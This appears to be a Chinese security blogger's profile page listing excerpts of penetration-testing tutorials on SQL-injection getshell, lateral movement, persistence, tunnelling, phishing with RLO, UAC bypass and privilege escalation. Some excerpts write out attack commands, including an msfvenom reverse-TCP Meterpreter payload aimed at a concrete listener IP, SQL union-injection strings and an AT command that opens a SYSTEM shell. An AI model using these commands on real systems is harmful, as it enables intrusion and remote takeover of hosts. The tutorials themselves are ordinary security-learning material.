- 博客(25)
- 收藏
- 关注
原创 记一次简单的从外网到内网渗透
一、SQL注入getshell1、直接SQL语法写文件(1)Mysql导出函数:into outfileinto dumpfile [可以写16进制写入](2)1290的安全性报错:是5.0版本之后,来禁止MySQL给本地存放数据需要修改MySQL的配置文件写一个:secure-file-priv=来防止1290的安全性报错(3)这里需要注意:我们得写绝对路径,绝对路径我们可以通过让网页PHP报错出来,并且双写\来防止\被MySQL转义了(4)最终语句:(靶场)宠物猫 异国
2023-05-25 19:04:17
383
原创 内网安全-常见横向移动总结
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。
2022-04-25 18:53:47
5931
原创 内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
内网安全之权限维持
2022-04-25 18:49:02
931
1
原创 内网安全-隧道技术-防火墙限制协议绕过-文件传输
隧道技术:一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。封装:隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递传输:被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道解包:一旦到达网络终点,数据将被解包并转发到最终目的地
2022-04-18 15:36:23
4329
2
原创 记一次简单的内网靶场实验
一、SQL注入getshell1、直接SQL语法写文件(1)Mysql导出函数:into outfileinto dumpfile [可以写16进制写入](2)1290的安全性报错:是5.0版本之后,来禁止MySQL给本地存放数据需要修改MySQL的配置文件写一个:secure-file-priv=来防止1290的安全性报错(3)这里需要注意:我们得写绝对路径,绝对路径我们可以通过让网页PHP报错出来,并且双写\来防止\被MySQL转义了(4)最终语句:(靶场)宠物猫 异国
2022-04-16 17:04:52
285
原创 frp-frpc: command not found 问题解决方案
今天进行内网学习时,ubuntu服务duan frp配置好后,客户端以kali为载体,客户端配置好IP后出现问题。在执行sudo ./frpc -c ./frpc.ini 命令时,总出现frpc: command not found 问题,特记下这次搞定的方法,便下次解决问题。修改frpc权限为777sudochmod777frpc注意:frpc/frpc.ini时两个不同的文件,不要给错权限。然后再重新执行sudo ./frpc -c ./frpc.ini 即可...
2022-03-27 17:37:06
3406
1
原创 CS-证书指纹修改
cobaltstrike.store是cobalt strike的证书文件,CS是java编写的,修改证书需要Java环境,搜索keytool,把证书复制到该目录进行操作,需要cmd以管理员权限才能生成成功。证书默认密码:123456查看证书指纹:keytool -list -v -keystore cobaltstrike.store生成证书指纹:keytool -keystore cobaltstrike1.store -storepass 123456 -key...
2021-11-28 22:20:24
807
原创 钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS
钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS
2021-11-26 22:54:27
2080
1
原创 Powershell框架&DLL劫持-权限提升
powershell简介Windows7以上的操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell开发的 很多安全软件并不能检测到PowerShell的活动 cmd.exe通常会被阻止运行,但是PowerShell不会 可以用来管理活动目录本次介绍两个项目:本地提权信息探针项目-JAWS&PowerSploithttps://github.com/411Hall
2021-11-19 21:33:49
1099
原创 BypassUAC-权限提升
什么是UAC?如何设置?UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级)参考:http://cn-sec.com/archives/116488.html#BypassUAC提权?常见绕过项目?为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC绕过项目:M
2021-11-19 16:50:12
1352
原创 权限提升-令牌窃取&进程注入-提权
令牌窃取演示服务器: Win2012 腾讯云服务器假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。本地权限 - Test in Win2012腾讯云服务器msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe配置监听会话use exploit/multi/han...
2021-11-19 12:51:27
442
原创 本地用户提权-AT&SC&PS命令提权
at命令提权的原理at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.当我们拿到低权限的用户,通过连接上服务器后,可以通过at命令来进行本地提权。测试主机:win2003at 11:00 /interactive cmd (在11:00分生成一个交互式的System权限的cmd)如果设定时间过时,将于次日执行。提权system成功..
2021-11-18 13:27:02
660
原创 postgre提权(CVE-2019-9193)
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。提权利用的是漏洞:CVE-2019-9193 CVE-2018-1058本次演示CVE-2019-9193提权复现步骤开启测试环境连接postgres新建查询,执行尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询测试成功...
2021-11-18 12:03:47
1299
原创 利用MSF&CS溢出漏洞提权云服务器windows server2012
Windows系统内核溢出漏洞提权溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关
2021-11-16 16:40:59
2434
原创 关于SQL手工注入的总结
虽然说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要讲之前学过的知识进行下整理总结,不足之处还请师傅指正。0x01 Mysql 手工注入1.1 联合注入?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0'unionselect1,2,3,group_concat(table_name)frominformation_sc...
2021-11-11 11:25:48
242
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人